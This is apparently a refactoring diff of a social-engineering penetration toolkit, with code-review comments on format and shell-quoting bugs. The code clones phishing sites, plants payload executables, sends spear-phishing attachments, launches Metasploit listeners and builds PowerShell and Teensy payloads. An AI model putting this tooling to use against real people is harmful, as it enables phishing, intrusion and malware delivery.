if os.path.isfile(userconfigpath + "multi_tabnabbing"):
|
||||
multiattack_harv = "on"
|
||||
|
||||
# open our config file that was specified in SET
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
# start loop here
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
|
@ -164,7 +164,7 @@ def web_server_start():
|
|||
url = line[1].rstrip()
|
||||
|
||||
# if we didn't create template then do self
|
||||
if not os.path.isfile(setdir + "/site.template"):
|
||||
if not os.path.isfile(userconfigpath + "site.template"):
|
||||
template = "SELF"
|
||||
|
||||
# If SET is setting up the website for you, get the website ready for
|
||||
|
@ -224,38 +224,38 @@ def web_server_start():
|
|||
if attack_vector != 'hijacking':
|
||||
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
|
||||
# copy all the files needed
|
||||
if not os.path.isfile(setdir + "/" + applet_name):
|
||||
if not os.path.isfile(userconfigpath + "" + applet_name):
|
||||
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
|
||||
(definepath), "%s/%s" % (setdir, applet_name))
|
||||
shutil.copyfile(setdir + "/%s" % (applet_name),
|
||||
"%s/web_clone/%s" % (setdir, applet_name))
|
||||
(definepath), "%s/%s" % (userconfigpath, applet_name))
|
||||
shutil.copyfile(userconfigpath + "%s" % (applet_name),
|
||||
"%s/web_clone/%s" % (userconfigpath, applet_name))
|
||||
if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
|
||||
nix = check_options("NIX.BIN=")
|
||||
shutil.copyfile("%s/src/html/nix.bin" %
|
||||
(definepath), "%s/web_clone/%s" % (setdir, nix))
|
||||
(definepath), "%s/web_clone/%s" % (userconfigpath, nix))
|
||||
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
|
||||
mac = check_options("MAC.BIN=")
|
||||
shutil.copyfile("%s/src/html/mac.bin" % (definepath),
|
||||
"%s/web_clone/%s" % (setdir, definepath, mac))
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
"%s/web_clone/%s" % (userconfigpath, definepath, mac))
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
win = check_options("MSF.EXE=")
|
||||
shutil.copyfile(setdir + "/msf.exe",
|
||||
"%s/web_clone/%s" % (setdir, win))
|
||||
shutil.copyfile(userconfigpath + "msf.exe",
|
||||
"%s/web_clone/%s" % (userconfigpath, win))
|
||||
|
||||
# pull random name generation
|
||||
print_status(
|
||||
"The site has been moved. SET Web Server is now listening..")
|
||||
rand_gen = check_options("MSF_EXE=")
|
||||
if rand_gen != 0:
|
||||
if os.path.isfile(setdir + "/custom.exe"):
|
||||
shutil.copyfile(setdir + "/msf.exe",
|
||||
setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "custom.exe"):
|
||||
shutil.copyfile(userconfigpath + "msf.exe",
|
||||
userconfigpath + "web_clone/msf.exe")
|
||||
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
|
||||
shutil.copyfile(setdir + "/web_clone/msf.exe",
|
||||
setdir + "/web_clone/%s" % (rand_gen))
|
||||
shutil.copyfile(userconfigpath + "web_clone/msf.exe",
|
||||
userconfigpath + "web_clone/%s" % (rand_gen))
|
||||
|
||||
# if docbase exploit do some funky stuff to get it to work right
|
||||
if os.path.isfile(setdir + "/docbase.file"):
|
||||
if os.path.isfile(userconfigpath + "docbase.file"):
|
||||
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
|
||||
"http://www.w3.org/TR/html4/frameset.dtd">
|
||||
<HTML>
|
||||
|
@ -267,11 +267,11 @@ def web_server_start():
|
|||
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
|
||||
</FRAMESET>
|
||||
</HTML>""" % (ipaddr))
|
||||
if os.path.isfile(setdir + "/web_clone/site.html"):
|
||||
os.remove(setdir + "/web_clone/site.html")
|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
setdir + "/web_clone/site.html")
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
if os.path.isfile(userconfigpath + "web_clone/site.html"):
|
||||
os.remove(userconfigpath + "web_clone/site.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
userconfigpath + "web_clone/site.html")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite.write(docbase)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -288,7 +288,7 @@ def web_server_start():
|
|||
import src.core.webserver as webserver
|
||||
# specify the path for the SET web directories for the applet
|
||||
# attack
|
||||
path = (setdir + "/web_clone/")
|
||||
path = (userconfigpath + "web_clone/")
|
||||
try:
|
||||
import multiprocessing
|
||||
p = multiprocessing.Process(
|
||||
|
@ -320,7 +320,7 @@ def web_server_start():
|
|||
import src.core.webserver as webserver
|
||||
# specify the path for the SET web directories for the
|
||||
# applet attack
|
||||
path = (setdir + "/web_clone/")
|
||||
path = (userconfigpath + "web_clone/")
|
||||
p = multiprocessing.Process(
|
||||
target=webserver.start_server, args=(web_port, path))
|
||||
p.start()
|
||||
|
@ -350,7 +350,7 @@ def web_server_start():
|
|||
|
||||
if apache == 1:
|
||||
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
|
||||
(definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait()
|
||||
(definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait()
|
||||
# if we are tracking users
|
||||
if track_email == "on":
|
||||
now = datetime.datetime.today()
|
||||
|
@ -395,15 +395,15 @@ web_server = check_config("WEB_PORT=")
|
|||
|
||||
# setup multi attack options here
|
||||
multiattack = "off"
|
||||
if os.path.isfile(setdir + "/multi_tabnabbing"):
|
||||
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
|
||||
multiattack = "on"
|
||||
if os.path.isfile(setdir + "/multi_harvester"):
|
||||
if os.path.isfile(userconfigpath + "multi_harvester"):
|
||||
multiattack = "on"
|
||||
|
||||
# Grab custom or set defined
|
||||
template = ""
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("TEMPLATE=", line)
|
||||
|
@ -532,8 +532,8 @@ try:
|
|||
print((
|
||||
bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
|
||||
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
fileopen = open(setdir + "/meta_config", "r")
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
fileopen = open(userconfigpath + "meta_config", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("set SRVPORT 80", line)
|
||||
|
@ -550,8 +550,8 @@ try:
|
|||
|
||||
web_server_start()
|
||||
# if we are using ettercap
|
||||
if os.path.isfile(setdir + "/ettercap"):
|
||||
fileopen5 = open(setdir + "/ettercap", "r")
|
||||
if os.path.isfile(userconfigpath + "ettercap"):
|
||||
fileopen5 = open(userconfigpath + "ettercap", "r")
|
||||
for line in fileopen5:
|
||||
ettercap = line.rstrip()
|
||||
# run in background
|
||||
|
@ -561,7 +561,7 @@ try:
|
|||
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
|
||||
|
||||
# if metasploit config is in directory
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
print_info("Launching MSF Listener...")
|
||||
print_info("This may take a few to load MSF...")
|
||||
# this checks to see if we want to start a listener
|
||||
|
@ -573,12 +573,12 @@ try:
|
|||
import pexpect
|
||||
# specify if we are using the multi pyinjector
|
||||
meta_config = "meta_config"
|
||||
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
|
||||
if os.path.isfile(userconfigpath + "meta_config_multipyinjector"):
|
||||
meta_config = "meta_config_multipyinjector"
|
||||
# if we arent using a custom payload
|
||||
if custom != 1:
|
||||
child1 = pexpect.spawn(
|
||||
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config))
|
||||
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config))
|
||||
# check if we want to deliver emails or track users that click the
|
||||
# link
|
||||
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
|
||||
|
@ -592,11 +592,11 @@ try:
|
|||
if custom != 1:
|
||||
child1.interact()
|
||||
|
||||
if os.path.isfile(setdir + "/set.payload"):
|
||||
if os.path.isfile(userconfigpath + "set.payload"):
|
||||
port = check_options("PORT=")
|
||||
|
||||
# grab configuration
|
||||
fileopen = open(setdir + "/set.payload", "r")
|
||||
fileopen = open(userconfigpath + "set.payload", "r")
|
||||
for line in fileopen:
|
||||
set_payload = line.rstrip()
|
||||
|
||||
|
@ -627,12 +627,12 @@ try:
|
|||
|
||||
# if not then run it in windows
|
||||
if operating_system == "windows":
|
||||
if not os.path.isfile(setdir + "/ratteserver.exe"):
|
||||
if not os.path.isfile(userconfigpath + "ratteserver.exe"):
|
||||
shutil.copyfile(
|
||||
"../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe")
|
||||
"../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe")
|
||||
shutil.copyfile(
|
||||
"../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll")
|
||||
os.system(setdir + "/ratteserver %s" % (definepath, port))
|
||||
"../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll")
|
||||
os.system(userconfigpath + "ratteserver %s" % (definepath, port))
|
||||
|
||||
# handle errors
|
||||
except Exception as e:
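Review bot: Two format expressions in this file pass more arguments than they have placeholders and will raise `TypeError` when reached: `"%s/web_clone/%s" % (userconfigpath, definepath, mac)` in the `mac.bin` copy, and `os.system(userconfigpath + "ratteserver %s" % (definepath, port))` in the Windows branch at the end. The first should be `"%s/web_clone/%s" % (userconfigpath, mac)`, matching the `nix.bin` copy just above it. The second presumably wants only the port, `"ratteserver %s" % (port)`, but the intended arguments should be confirmed. Both were already present with `setdir` and were carried over by the rename. Separately, `userconfigpath + "" + applet_name` keeps a leftover empty string.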
|
||||
|
|
|
@ -26,7 +26,7 @@ auto_migrate = check_config("AUTO_MIGRATE=")
|
|||
pyinjection = check_options("PYINJECTION=")
|
||||
if pyinjection == "ON":
|
||||
# check to ensure that the payload options were specified right
|
||||
if os.path.isfile(setdir + "/payload_options.shellcode"):
|
||||
if os.path.isfile(userconfigpath + "payload_options.shellcode"):
|
||||
pyinjection = "on"
|
||||
print_status(
|
||||
"Multi/Pyinjection was specified. Overriding config options.")
|
||||
|
@ -56,7 +56,7 @@ if validate_ip(ipaddr) == False:
|
|||
|
||||
# prompt what port to listen on for powershell then make an append to the current
|
||||
# metasploit answer file
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
# if we have multi injection on, don't worry about these
|
||||
if multi_injection != "on":
|
||||
if pyinjection == "off":
|
||||
|
@ -66,12 +66,12 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
|||
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||
if port == "":
|
||||
port = "443"
|
||||
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
|
||||
fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r")
|
||||
data = fileopen.read()
|
||||
match = re.search(port, data)
|
||||
if not match:
|
||||
filewrite = open(
|
||||
"%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
|
@ -84,7 +84,7 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
|||
if multi_injection != "on":
|
||||
if pyinjection == "off":
|
||||
# check to see if the meta config multi pyinjector is there
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
if check_options("PORT=") != 0:
|
||||
port = check_options("PORT=")
|
||||
# if port.options isnt there then prompt
|
||||
|
@ -128,12 +128,12 @@ if multi_injection == "on":
|
|||
generate_powershell_alphanumeric_payload(
|
||||
powershell_inject_x86, ipaddr, ports, x86)
|
||||
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
port_check = check_ports(
|
||||
"%s/meta_config_multipyinjector" % (setdir), ports)
|
||||
"%s/meta_config_multipyinjector" % (userconfigpath), ports)
|
||||
if port_check == False:
|
||||
filewrite = open(
|
||||
"%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
|
@ -143,15 +143,15 @@ if multi_injection == "on":
|
|||
filewrite.close()
|
||||
|
||||
# if we aren't using multi pyinjector
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
# if meta config isn't created yet then create it
|
||||
if not os.path.isfile("%s/meta_config" % (setdir)):
|
||||
filewrite = open("%s/meta_config" % (setdir), "w")
|
||||
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "w")
|
||||
filewrite.write("")
|
||||
filewrite.close()
|
||||
port_check = check_ports("%s/meta_config" % (setdir), ports)
|
||||
port_check = check_ports("%s/meta_config" % (userconfigpath), ports)
|
||||
if port_check == False:
|
||||
filewrite = open("%s/meta_config" % (setdir), "a")
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
|
@ -164,7 +164,7 @@ if multi_injection == "on":
|
|||
if pyinjection == "on":
|
||||
multi_injection_x86 = ""
|
||||
# read in the file we need for parsing
|
||||
fileopen = open(setdir + "/payload_options.shellcode", "r")
|
||||
fileopen = open(userconfigpath + "payload_options.shellcode", "r")
|
||||
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
|
||||
payloads = payloads.split(",")
|
||||
# format: payload<space>port
|
||||
|
@ -196,7 +196,7 @@ if verbose.lower() == "on":
|
|||
time.sleep(3)
|
||||
print(x86)
|
||||
|
||||
filewrite = open("%s/x86.powershell" % (setdir), "w")
|
||||
filewrite = open("%s/x86.powershell" % (userconfigpath), "w")
|
||||
filewrite.write(x86)
|
||||
filewrite.close()
|
||||
print_status("Finished generating powershell injection bypass.")
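Review bot: The new path expressions in this file come in two forms, `userconfigpath + "payload_options.shellcode"` (hunks at 26 and 164) and `"%s/meta_config_multipyinjector" % (userconfigpath)` (hunks at 56 through 143 and at 196), so the concatenated form resolves correctly only if `userconfigpath` ends with a path separator, which is not visible in this diff. If it does not, the `isfile` checks test a differently named sibling path and the branch is skipped without any error. The same bare concatenation is used in the later file sections of this commit (`uac.address`, `template.*`, `multi_payload`, `dll/`, `web_clone/`). Writing each path as `os.path.join(userconfigpath, "payload_options.shellcode")` gives the same result whether or not the trailing separator is there.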
|
||||
|
|
|
@ -17,10 +17,10 @@ definepath = os.getcwd()
|
|||
sys.path.append(definepath)
|
||||
|
||||
# cleanup
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
os.remove(setdir + "/uac.address")
|
||||
if os.path.isfile(setdir + "/system.address"):
|
||||
os.remove(setdir + "/system.address")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
os.remove(userconfigpath + "uac.address")
|
||||
if os.path.isfile(userconfigpath + "system.address"):
|
||||
os.remove(userconfigpath + "system.address")
|
||||
|
||||
# will remove this later
|
||||
core_modules = True
|
||||
|
@ -863,9 +863,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
time.sleep(0.5)
|
||||
|
||||
# write out system
|
||||
if os.path.isfile("%s/system.address" % (setdir)):
|
||||
os.remove("%s/system.address" % (setdir))
|
||||
filewrite = open("%s/system.address" % (setdir), "w")
|
||||
if os.path.isfile("%s/system.address" % (userconfigpath)):
|
||||
os.remove("%s/system.address" % (userconfigpath))
|
||||
filewrite = open("%s/system.address" % (userconfigpath), "w")
|
||||
filewrite.write(addr)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -882,9 +882,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
# had to do some funky stuff here because global vars are not working properly
|
||||
# inside threads, so the information cant be passed to
|
||||
# normal outside routines
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
os.remove(setdir + "/uac.address")
|
||||
filewrite = open(setdir + "/uac.address", "w")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
os.remove(userconfigpath + "uac.address")
|
||||
filewrite = open(userconfigpath + "uac.address", "w")
|
||||
filewrite.write(addr)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -1033,9 +1033,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
if os.path.isfile("src/payloads/set_payloads/persistence.binary"):
|
||||
if core_modules == True:
|
||||
subprocess.Popen(
|
||||
"cp src/payloads/set_payloads/persistence.binary %s" % (setdir), shell=True).wait()
|
||||
upx("%s/persistence.binary" % (setdir))
|
||||
upload = "%s/persistence.binary" % (setdir)
|
||||
"cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait()
|
||||
upx("%s/persistence.binary" % (userconfigpath))
|
||||
upload = "%s/persistence.binary" % (userconfigpath)
|
||||
if core_modules == False:
|
||||
upload = "src/payloads/set_payloads/persistence.binary"
|
||||
|
||||
|
@ -1085,9 +1085,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
|
||||
if core_modules == True:
|
||||
subprocess.Popen(
|
||||
"cp src/payloads/set_payloads/shell.windows %s" % (setdir), shell=True).wait()
|
||||
upx(setdir + "/shell.windows")
|
||||
upload = setdir + "/shell.windows"
|
||||
"cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait()
|
||||
upx(userconfigpath + "shell.windows")
|
||||
upload = userconfigpath + "shell.windows"
|
||||
if core_modules == False:
|
||||
upload = "src/payloads/set_payloads/shell.windows"
|
||||
|
||||
|
@ -1437,8 +1437,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
# if we have a windows shell
|
||||
if data == "IHAYYYYYIAMSETANDIAMWINDOWS":
|
||||
|
||||
if os.path.isfile(setdir + "/system.address"):
|
||||
fileopen = open(setdir + "/system.address", "r")
|
||||
if os.path.isfile(userconfigpath + "system.address"):
|
||||
fileopen = open(userconfigpath + "system.address", "r")
|
||||
system = fileopen.read().rstrip()
|
||||
system = system.replace(":WINDOWS", "")
|
||||
system = system.replace(":UAC-SAFE", "")
|
||||
|
@ -1446,8 +1446,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
temp_addr = str(addr[0] + ":WINDOWS:SYSTEM")
|
||||
bypass_counter = 1
|
||||
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
fileopen = open(setdir + "/uac.address", "r")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
fileopen = open(userconfigpath + "uac.address", "r")
|
||||
uac = fileopen.read().rstrip()
|
||||
uac = uac.replace(":WINDOWS", "")
|
||||
if str(addr[0]) == str(uac):
|
||||
|
@ -1479,12 +1479,12 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
|
||||
# reset value
|
||||
# if uac != None:
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
os.remove(setdir + "/uac.address")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
os.remove(userconfigpath + "uac.address")
|
||||
bypass_counter = 0
|
||||
|
||||
if os.path.isfile(setdir + "/system.address"):
|
||||
os.remove(setdir + "/system.address")
|
||||
if os.path.isfile(userconfigpath + "system.address"):
|
||||
os.remove(userconfigpath + "system.address")
|
||||
bypass_counter = 0
|
||||
|
||||
if addr[0] != "127.0.0.1":
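Review bot: The `persistence.binary` and `shell.windows` copies in the hunks at 1033 and 1085 still go through `cp` with `shell=True` and the destination interpolated unquoted, so a user config path containing a space or a shell metacharacter splits or alters the command. The exit status returned by `.wait()` is discarded before `upx()` runs on the result. `shutil.copy("src/payloads/set_payloads/persistence.binary", userconfigpath)` (and the same for `shell.windows`) needs no shell and raises if the copy fails; it requires `shutil` to be imported, which cannot be confirmed from these hunks. The enclosing blocks start and end outside the hunks.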
|
||||
|
|
|
@ -109,41 +109,41 @@ print_info(
|
|||
"As an added bonus, use the file-format creator in SET to create your attachment.")
|
||||
counter = 0
|
||||
# PDF Previous
|
||||
if os.path.isfile(setdir + "/template.pdf"):
|
||||
if os.path.isfile(setdir + "/template.rar"):
|
||||
if os.path.isfile(setdir + "/template.zip"):
|
||||
if os.path.isfile(userconfigpath + "template.pdf"):
|
||||
if os.path.isfile(userconfigpath + "template.rar"):
|
||||
if os.path.isfile(userconfigpath + "template.zip"):
|
||||
print_warning("Multiple payloads were detected:")
|
||||
print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n")
|
||||
choose_payload = input(setprompt("0", ""))
|
||||
if choose_payload == '1':
|
||||
file_format = (setdir + "/template.pdf")
|
||||
file_format = (userconfigpath + "template.pdf")
|
||||
if choose_payload == '2':
|
||||
file_format = (setdir + "/template.rar")
|
||||
file_format = (userconfigpath + "template.rar")
|
||||
if choose_payload == '3':
|
||||
file_format = (setdir + "/template.zip")
|
||||
file_format = (userconfigpath + "template.zip")
|
||||
counter = 1
|
||||
|
||||
if counter == 0:
|
||||
if os.path.isfile(setdir + "/template.pdf"):
|
||||
file_format = (setdir + "/template.pdf")
|
||||
if os.path.isfile(setdir + "/template.rar"):
|
||||
file_format = (setdir + "/template.rar")
|
||||
if os.path.isfile(setdir + "/template.zip"):
|
||||
file_format = (setdir + "/template.zip")
|
||||
if os.path.isfile(setdir + "/template.doc"):
|
||||
file_format = (setdir + "/template.doc")
|
||||
if os.path.isfile(setdir + "/template.rtf"):
|
||||
file_format = (setdir + "/template.rtf")
|
||||
if os.path.isfile(setdir + "/template.mov"):
|
||||
file_format = (setdir + "/template.mov")
|
||||
if os.path.isfile(userconfigpath + "template.pdf"):
|
||||
file_format = (userconfigpath + "template.pdf")
|
||||
if os.path.isfile(userconfigpath + "template.rar"):
|
||||
file_format = (userconfigpath + "template.rar")
|
||||
if os.path.isfile(userconfigpath + "template.zip"):
|
||||
file_format = (userconfigpath + "template.zip")
|
||||
if os.path.isfile(userconfigpath + "template.doc"):
|
||||
file_format = (userconfigpath + "template.doc")
|
||||
if os.path.isfile(userconfigpath + "template.rtf"):
|
||||
file_format = (userconfigpath + "template.rtf")
|
||||
if os.path.isfile(userconfigpath + "template.mov"):
|
||||
file_format = (userconfigpath + "template.mov")
|
||||
|
||||
# Determine if prior payload created
|
||||
if not os.path.isfile(setdir + "/template.pdf"):
|
||||
if not os.path.isfile(setdir + "/template.rar"):
|
||||
if not os.path.isfile(setdir + "/template.zip"):
|
||||
if not os.path.isfile(setdir + "/template.doc"):
|
||||
if not os.path.isfile(setdir + "/template.rtf"):
|
||||
if not os.path.isfile(setdir + "/template.mov"):
|
||||
if not os.path.isfile(userconfigpath + "template.pdf"):
|
||||
if not os.path.isfile(userconfigpath + "template.rar"):
|
||||
if not os.path.isfile(userconfigpath + "template.zip"):
|
||||
if not os.path.isfile(userconfigpath + "template.doc"):
|
||||
if not os.path.isfile(userconfigpath + "template.rtf"):
|
||||
if not os.path.isfile(userconfigpath + "template.mov"):
|
||||
print("No previous payload created.")
|
||||
file_format = input(
|
||||
setprompt(["1"], "Enter the file to use as an attachment"))
|
||||
|
@ -175,8 +175,8 @@ if filename1 == '1' or filename1 == '':
|
|||
if filename1 == '2':
|
||||
filename1 = input(setprompt(["1"], "New filename"))
|
||||
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" %
|
||||
(file_format, setdir, filename1), shell=True).wait()
|
||||
file_format = ("%s/%s" % (setdir, filename1))
|
||||
(file_format, userconfigpath, filename1), shell=True).wait()
|
||||
file_format = ("%s/%s" % (userconfigpath, filename1))
|
||||
print_status("Filename changed, moving on...")
|
||||
|
||||
print ("""
|
||||
|
@ -210,7 +210,7 @@ if option1 == '1' or option1 == '2':
|
|||
if template_choice == '1':
|
||||
# set path for
|
||||
path = 'src/templates/'
|
||||
filewrite = open(setdir + "/email.templates", "w")
|
||||
filewrite = open(userconfigpath + "email.templates", "w")
|
||||
counter = 0
|
||||
# Pull all files in the templates directory
|
||||
for infile in glob.glob(os.path.join(path, '*.template')):
|
||||
|
@ -223,7 +223,7 @@ if option1 == '1' or option1 == '2':
|
|||
# close the file
|
||||
filewrite.close()
|
||||
# read in formatted filenames
|
||||
fileread = open(setdir + "/email.templates", "r").readlines()
|
||||
fileread = open(userconfigpath + "email.templates", "r").readlines()
|
||||
print_info("Available templates:")
|
||||
for line in fileread:
|
||||
line = line.rstrip()
|
||||
|
@ -459,31 +459,31 @@ if option1 == '2':
|
|||
email_num = email_num + 1
|
||||
print(" Sent e-mail number: " + (str(email_num)))
|
||||
|
||||
if not os.path.isfile(setdir + "/template.zip"):
|
||||
if not os.path.isfile(userconfigpath + "template.zip"):
|
||||
print_status("SET has finished delivering the emails")
|
||||
question1 = yesno_prompt(["1"], "Setup a listener [yes|no]")
|
||||
if question1 == 'YES':
|
||||
if not os.path.isfile(setdir + "/payload.options"):
|
||||
if not os.path.isfile(setdir + "/meta_config"):
|
||||
if not os.path.isfile(setdir + "/unc_config"):
|
||||
if not os.path.isfile(userconfigpath + "payload.options"):
|
||||
if not os.path.isfile(userconfigpath + "meta_config"):
|
||||
if not os.path.isfile(userconfigpath + "unc_config"):
|
||||
print_error(
|
||||
"Sorry, you did not generate your payload through SET, this option is not supported.")
|
||||
if os.path.isfile(setdir + "/unc_config"):
|
||||
if os.path.isfile(userconfigpath + "unc_config"):
|
||||
child = pexpect.spawn(
|
||||
"%smsfconsole -r %s/unc_config" % (meta_path, setdir))
|
||||
"%smsfconsole -r %s/unc_config" % (meta_path, userconfigpath))
|
||||
try:
|
||||
child.interact()
|
||||
except Exception:
|
||||
child.close()
|
||||
|
||||
if os.path.isfile(setdir + "/payload.options"):
|
||||
fileopen = open(setdir + "/payload.options", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "payload.options"):
|
||||
fileopen = open(userconfigpath + "payload.options", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
line = line.split(" ")
|
||||
|
||||
# CREATE THE LISTENER HERE
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
filewrite.write("use exploit/multi/handler\n")
|
||||
filewrite.write("set PAYLOAD " + line[0] + "\n")
|
||||
filewrite.write("set LHOST " + line[1] + "\n")
|
||||
|
@ -493,7 +493,7 @@ if not os.path.isfile(setdir + "/template.zip"):
|
|||
filewrite.write("exploit -j\r\n\r\n")
|
||||
filewrite.close()
|
||||
child = pexpect.spawn(
|
||||
"%smsfconsole -r %s/meta_config" % (meta_path, setdir))
|
||||
"%smsfconsole -r %s/meta_config" % (meta_path, userconfigpath))
|
||||
try:
|
||||
child.interact()
|
||||
except Exception:
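Review bot: In the hunk at 175, `file_format` and `filename1` are read from `input()` and interpolated unquoted into a `cp` command run with `shell=True`, with both output streams sent to `/dev/null`. A name containing a space or a shell metacharacter changes what the shell executes, and a failed copy goes unnoticed, after which `file_format` is pointed at a file that may not exist. `shutil.copyfile(file_format, os.path.join(userconfigpath, filename1))` performs the copy without a shell and raises on failure; `shutil` would need to be imported if the file does not already do so.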
|
||||
|
|
|
@ -308,24 +308,24 @@ Keyboard.send_now();
|
|||
}""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs))
|
||||
# delete temporary file
|
||||
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
|
||||
if not os.path.isdir(setdir + "reports"): os.makedirs(setdir + "reports")
|
||||
print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (setdir))
|
||||
if not os.path.isdir(userconfigpath + "reports"): os.makedirs(userconfigpath + "reports")
|
||||
print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (userconfigpath))
|
||||
# write the teensy.ino file out
|
||||
filewrite = file(setdir + "reports/binary2teensy.ino", "w")
|
||||
filewrite = file(userconfigpath + "reports/binary2teensy.ino", "w")
|
||||
# write the teensy.ino file out
|
||||
filewrite.write(output_variable)
|
||||
# close the file
|
||||
filewrite.close()
|
||||
print_status("Generating a listener...")
|
||||
